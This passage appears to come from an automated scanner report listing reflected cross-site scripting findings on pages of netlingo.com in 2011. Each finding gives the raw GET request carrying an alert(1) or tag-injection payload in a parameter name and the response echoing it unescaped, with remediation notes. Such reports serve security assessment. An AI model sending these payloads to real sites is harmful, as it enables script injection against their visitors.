Host: www.netlingo.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Tue, 25 Jan 2011 04:53:23 GMT
Server: Apache/2.2.3 (CentOS)
X-Powered-By: PHP/5.2.9
Connection: close
Content-Type: text/html
Content-Length: 49203

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<ti
...[SNIP]...
w.netlingo.com/word-subscribe.php?TB_iframe=true&height=330&width=420&modal=true');
                           });
                           
                           $("#send_page").click(function() {
                               data    =    "page_name=/tips/file-extensions.php?8e085"-alert(1)-"e00943c83cd=1";                                
                               tb_open_new('http://www.netlingo.com/send-page.php?'+data+'TB_iframe=true&height=450&width=500&modal=true');
                           });
                       });                        
</script>
...[SNIP]...

4.1299. http://www.netlingo.com/tips/index.php [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.netlingo.com
Path:   /tips/index.php

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 896a9"-alert(1)-"818a71d9ba5 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /tips/index.php?896a9"-alert(1)-"818a71d9ba5=1 HTTP/1.1
Host: www.netlingo.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Tue, 25 Jan 2011 04:53:19 GMT
Server: Apache/2.2.3 (CentOS)
X-Powered-By: PHP/5.2.9
Connection: close
Content-Type: text/html
Content-Length: 34468

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<ti
...[SNIP]...
'http://www.netlingo.com/word-subscribe.php?TB_iframe=true&height=330&width=420&modal=true');
                           });
                           
                           $("#send_page").click(function() {
                               data    =    "page_name=/tips/index.php?896a9"-alert(1)-"818a71d9ba5=1";                                
                               tb_open_new('http://www.netlingo.com/send-page.php?'+data+'TB_iframe=true&height=450&width=500&modal=true');
                           });
                       });                        
</script>
...[SNIP]...

4.1300. http://www.netlingo.com/tips/resources.php [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.netlingo.com
Path:   /tips/resources.php

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 8ce45"-alert(1)-"00082030088 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /tips/resources.php?8ce45"-alert(1)-"00082030088=1 HTTP/1.1
Host: www.netlingo.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Tue, 25 Jan 2011 04:53:33 GMT
Server: Apache/2.2.3 (CentOS)
X-Powered-By: PHP/5.2.9
Connection: close
Content-Type: text/html
Content-Length: 73613

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<ti
...[SNIP]...
p://www.netlingo.com/word-subscribe.php?TB_iframe=true&height=330&width=420&modal=true');
                           });
                           
                           $("#send_page").click(function() {
                               data    =    "page_name=/tips/resources.php?8ce45"-alert(1)-"00082030088=1";                                
                               tb_open_new('http://www.netlingo.com/send-page.php?'+data+'TB_iframe=true&height=450&width=500&modal=true');
                           });
                       });                        
</script>
...[SNIP]...

4.1301. http://www.netlingo.com/tips/webcasts.php [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.netlingo.com
Path:   /tips/webcasts.php

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 31820"-alert(1)-"d58a1ad0998 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /tips/webcasts.php?31820"-alert(1)-"d58a1ad0998=1 HTTP/1.1
Host: www.netlingo.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Tue, 25 Jan 2011 04:53:33 GMT
Server: Apache/2.2.3 (CentOS)
X-Powered-By: PHP/5.2.9
Connection: close
Content-Type: text/html
Content-Length: 37222

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<ti
...[SNIP]...
tp://www.netlingo.com/word-subscribe.php?TB_iframe=true&height=330&width=420&modal=true');
                           });
                           
                           $("#send_page").click(function() {
                               data    =    "page_name=/tips/webcasts.php?31820"-alert(1)-"d58a1ad0998=1";                                
                               tb_open_new('http://www.netlingo.com/send-page.php?'+data+'TB_iframe=true&height=450&width=500&modal=true');
                           });
                       });                        
</script>
...[SNIP]...

4.1302. http://www.netlingo.com/tools/index.php [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.netlingo.com
Path:   /tools/index.php

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload cf4cf"-alert(1)-"bdab9c4d654 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /tools/index.php?cf4cf"-alert(1)-"bdab9c4d654=1 HTTP/1.1
Host: www.netlingo.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Tue, 25 Jan 2011 04:51:38 GMT
Server: Apache/2.2.3 (CentOS)
X-Powered-By: PHP/5.2.9
Connection: close
Content-Type: text/html
Content-Length: 35165

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<ti
...[SNIP]...
http://www.netlingo.com/word-subscribe.php?TB_iframe=true&height=330&width=420&modal=true');
                           });
                           
                           $("#send_page").click(function() {
                               data    =    "page_name=/tools/index.php?cf4cf"-alert(1)-"bdab9c4d654=1";                                
                               tb_open_new('http://www.netlingo.com/send-page.php?'+data+'TB_iframe=true&height=450&width=500&modal=true');
                           });
                       });                        
</script>
...[SNIP]...

4.1303. http://www.netlingo.com/tools/online-store.php [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.netlingo.com
Path:   /tools/online-store.php

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload ba509"-alert(1)-"fd72fdd2008 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /tools/online-store.php?ba509"-alert(1)-"fd72fdd2008=1 HTTP/1.1
Host: www.netlingo.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Tue, 25 Jan 2011 04:52:01 GMT
Server: Apache/2.2.3 (CentOS)
X-Powered-By: PHP/5.2.9
Connection: close
Content-Type: text/html
Content-Length: 31833

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<ti
...[SNIP]...
www.netlingo.com/word-subscribe.php?TB_iframe=true&height=330&width=420&modal=true');
                           });
                           
                           $("#send_page").click(function() {
                               data    =    "page_name=/tools/online-store.php?ba509"-alert(1)-"fd72fdd2008=1";                                
                               tb_open_new('http://www.netlingo.com/send-page.php?'+data+'TB_iframe=true&height=450&width=500&modal=true');
                           });
                       });                        
</script>
...[SNIP]...

4.1304. http://www.netlingo.com/tools/pocket-dictionary.php [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.netlingo.com
Path:   /tools/pocket-dictionary.php

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload db5a1"-alert(1)-"ae07cad321d was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /tools/pocket-dictionary.php?db5a1"-alert(1)-"ae07cad321d=1 HTTP/1.1
Host: www.netlingo.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Tue, 25 Jan 2011 04:51:40 GMT
Server: Apache/2.2.3 (CentOS)
X-Powered-By: PHP/5.2.9
Connection: close
Content-Type: text/html
Content-Length: 34982

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<ti
...[SNIP]...
etlingo.com/word-subscribe.php?TB_iframe=true&height=330&width=420&modal=true');
                           });
                           
                           $("#send_page").click(function() {
                               data    =    "page_name=/tools/pocket-dictionary.php?db5a1"-alert(1)-"ae07cad321d=1";                                
                               tb_open_new('http://www.netlingo.com/send-page.php?'+data+'TB_iframe=true&height=450&width=500&modal=true');
                           });
                       });                        
</script>
...[SNIP]...

4.1305. http://www.netlingo.com/tools/search-browse-box.php [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.netlingo.com
Path:   /tools/search-browse-box.php

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 9dfb8"-alert(1)-"ec101ac6a81 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /tools/search-browse-box.php?9dfb8"-alert(1)-"ec101ac6a81=1 HTTP/1.1
Host: www.netlingo.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Tue, 25 Jan 2011 04:51:51 GMT
Server: Apache/2.2.3 (CentOS)
X-Powered-By: PHP/5.2.9
Connection: close
Content-Type: text/html
Content-Length: 39741

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<ti
...[SNIP]...
etlingo.com/word-subscribe.php?TB_iframe=true&height=330&width=420&modal=true');
                           });
                           
                           $("#send_page").click(function() {
                               data    =    "page_name=/tools/search-browse-box.php?9dfb8"-alert(1)-"ec101ac6a81=1";                                
                               tb_open_new('http://www.netlingo.com/send-page.php?'+data+'TB_iframe=true&height=450&width=500&modal=true');
                           });
                       });                        
</script>
...[SNIP]...

4.1306. http://www.netlingo.com/tools/toolbar.php [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.netlingo.com
Path:   /tools/toolbar.php

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload f1a8c"-alert(1)-"a5093f4aeaf was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /tools/toolbar.php?f1a8c"-alert(1)-"a5093f4aeaf=1 HTTP/1.1
Host: www.netlingo.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Tue, 25 Jan 2011 04:51:52 GMT
Server: Apache/2.2.3 (CentOS)
X-Powered-By: PHP/5.2.9
Connection: close
Content-Type: text/html
Content-Length: 33849

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<ti
...[SNIP]...
tp://www.netlingo.com/word-subscribe.php?TB_iframe=true&height=330&width=420&modal=true');
                           });
                           
                           $("#send_page").click(function() {
                               data    =    "page_name=/tools/toolbar.php?f1a8c"-alert(1)-"a5093f4aeaf=1";                                
                               tb_open_new('http://www.netlingo.com/send-page.php?'+data+'TB_iframe=true&height=450&width=500&modal=true');
                           });
                       });                        
</script>
...[SNIP]...

4.1307. http://www.netlingo.com/tools/widget.php [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.netlingo.com
Path:   /tools/widget.php

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload b8e65"-alert(1)-"26a6782f73 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /tools/widget.php?b8e65"-alert(1)-"26a6782f73=1 HTTP/1.1
Host: www.netlingo.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Tue, 25 Jan 2011 04:51:56 GMT
Server: Apache/2.2.3 (CentOS)
X-Powered-By: PHP/5.2.9
Connection: close
Content-Type: text/html
Content-Length: 34401

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<ti
...[SNIP]...
ttp://www.netlingo.com/word-subscribe.php?TB_iframe=true&height=330&width=420&modal=true');
                           });
                           
                           $("#send_page").click(function() {
                               data    =    "page_name=/tools/widget.php?b8e65"-alert(1)-"26a6782f73=1";                                
                               tb_open_new('http://www.netlingo.com/send-page.php?'+data+'TB_iframe=true&height=450&width=500&modal=true');
                           });
                       });                        
</script>
...[SNIP]...

4.1308. http://www.netlingo.com/tools/wotd.php [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.netlingo.com
Path:   /tools/wotd.php

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 294d6"><a>ffde4f89edb was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /tools/wotd.php?294d6"><a>ffde4f89edb=1 HTTP/1.1
Host: www.netlingo.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Tue, 25 Jan 2011 04:51:21 GMT
Server: Apache/2.2.3 (CentOS)
X-Powered-By: PHP/5.2.9
Connection: close
Content-Type: text/html
Content-Length: 41295

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<ti
...[SNIP]...
<input type="hidden" name="referer" id="referer" value="word/wotd?294d6"><a>ffde4f89edb=1" />
...[SNIP]...

4.1309. http://www.netlingo.com/top50/index.php [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.netlingo.com
Path:   /top50/index.php

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 9e98e"-alert(1)-"4500bc2d8fd was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /top50/index.php?9e98e"-alert(1)-"4500bc2d8fd=1 HTTP/1.1
Host: www.netlingo.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Tue, 25 Jan 2011 04:53:58 GMT
Server: Apache/2.2.3 (CentOS)
X-Powered-By: PHP/5.2.9
Connection: close
Content-Type: text/html
Content-Length: 37445

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<ti
...[SNIP]...
http://www.netlingo.com/word-subscribe.php?TB_iframe=true&height=330&width=420&modal=true');
                           });
                           
                           $("#send_page").click(function() {
                               data    =    "page_name=/top50/index.php?9e98e"-alert(1)-"4500bc2d8fd=1";                                
                               tb_open_new('http://www.netlingo.com/send-page.php?'+data+'TB_iframe=true&height=450&width=500&modal=true');
                           });
                       });                        
</script>
...[SNIP]...

4.1310. http://www.netlingo.com/word-of-the-day/aotd.php [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.netlingo.com
Path:   /word-of-the-day/aotd.php

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload dc897"><a>4481ee578ce was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /word-of-the-day/aotd.php?dc897"><a>4481ee578ce=1 HTTP/1.1
Host: www.netlingo.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Tue, 25 Jan 2011 04:45:24 GMT
Server: Apache/2.2.3 (CentOS)
X-Powered-By: PHP/5.2.9
Connection: close
Content-Type: text/html
Content-Length: 42366

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<ti
...[SNIP]...
<input type="hidden" name="referer" id="referer" value="word/aotd?dc897"><a>4481ee578ce=1" />
...[SNIP]...

4.1311. http://www.netlingo.com/word-of-the-day/business.php [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.netlingo.com
Path:   /word-of-the-day/business.php

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload da361"><a>4822f8fb4db was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /word-of-the-day/business.php?da361"><a>4822f8fb4db=1 HTTP/1.1
Host: www.netlingo.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Tue, 25 Jan 2011 04:45:54 GMT
Server: Apache/2.2.3 (CentOS)
X-Powered-By: PHP/5.2.9
Connection: close
Content-Type: text/html
Content-Length: 40825

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<ti
...[SNIP]...
<input type="hidden" name="referer" id="referer" value="word/business?da361"><a>4822f8fb4db=1" />
...[SNIP]...

4.1312. http://www.netlingo.com/word-of-the-day/feeds.php [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.netlingo.com
Path:   /word-of-the-day/feeds.php

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload a84cb"-alert(1)-"1c9aec7a4f3 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /word-of-the-day/feeds.php?a84cb"-alert(1)-"1c9aec7a4f3=1 HTTP/1.1
Host: www.netlingo.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Tue, 25 Jan 2011 04:45:21 GMT
Server: Apache/2.2.3 (CentOS)
X-Powered-By: PHP/5.2.9
Connection: close
Content-Type: text/html
Content-Length: 38243

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<ti
...[SNIP]...
.netlingo.com/word-subscribe.php?TB_iframe=true&height=330&width=420&modal=true');
                           });
                           
                           $("#send_page").click(function() {
                               data    =    "page_name=/word-of-the-day/feeds.php?a84cb"-alert(1)-"1c9aec7a4f3=1";                                
                               tb_open_new('http://www.netlingo.com/send-page.php?'+data+'TB_iframe=true&height=450&width=500&modal=true');
                           });
                       });                        
</script>
...[SNIP]...

4.1313. http://www.netlingo.com/word-of-the-day/jargon.php [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.netlingo.com
Path:   /word-of-the-day/jargon.php

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 5788f"><a>9028b8a2949 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /word-of-the-day/jargon.php?5788f"><a>9028b8a2949=1 HTTP/1.1
Host: www.netlingo.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Tue, 25 Jan 2011 04:45:29 GMT
Server: Apache/2.2.3 (CentOS)
X-Powered-By: PHP/5.2.9
Connection: close
Content-Type: text/html
Content-Length: 41305

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<ti
...[SNIP]...
<input type="hidden" name="referer" id="referer" value="word/jargon?5788f"><a>9028b8a2949=1" />
...[SNIP]...

4.1314. http://www.netlingo.com/word-of-the-day/technical.php [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.netlingo.com
Path:   /word-of-the-day/technical.php

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload a02d3"><a>c8347305e25 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /word-of-the-day/technical.php?a02d3"><a>c8347305e25=1 HTTP/1.1
Host: www.netlingo.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Tue, 25 Jan 2011 04:46:02 GMT
Server: Apache/2.2.3 (CentOS)
X-Powered-By: PHP/5.2.9
Connection: close
Content-Type: text/html
Content-Length: 41402

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<ti
...[SNIP]...
<input type="hidden" name="referer" id="referer" value="word/technical?a02d3"><a>c8347305e25=1" />
...[SNIP]...

4.1315. http://www.netlingo.com/word/53x.php [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.netlingo.com
Path:   /word/53x.php

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 21222"><a>ee8a5baf684 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /word/53x.php?21222"><a>ee8a5baf684=1 HTTP/1.1
Host: www.netlingo.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Tue, 25 Jan 2011 04:58:45 GMT
Server: Apache/2.2.3 (CentOS)
X-Powered-By: PHP/5.2.9
Connection: close
Content-Type: text/html
Content-Length: 42062

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<ti
...[SNIP]...
<input type="hidden" name="referer" id="referer" value="word/53x?21222"><a>ee8a5baf684=1" />
...[SNIP]...

4.1316. http://www.netlingo.com/word/aor.php [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.netlingo.com
Path:   /word/aor.php

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 8757c"><a>7ac90e61106 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /word/aor.php?8757c"><a>7ac90e61106=1 HTTP/1.1
Host: www.netlingo.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
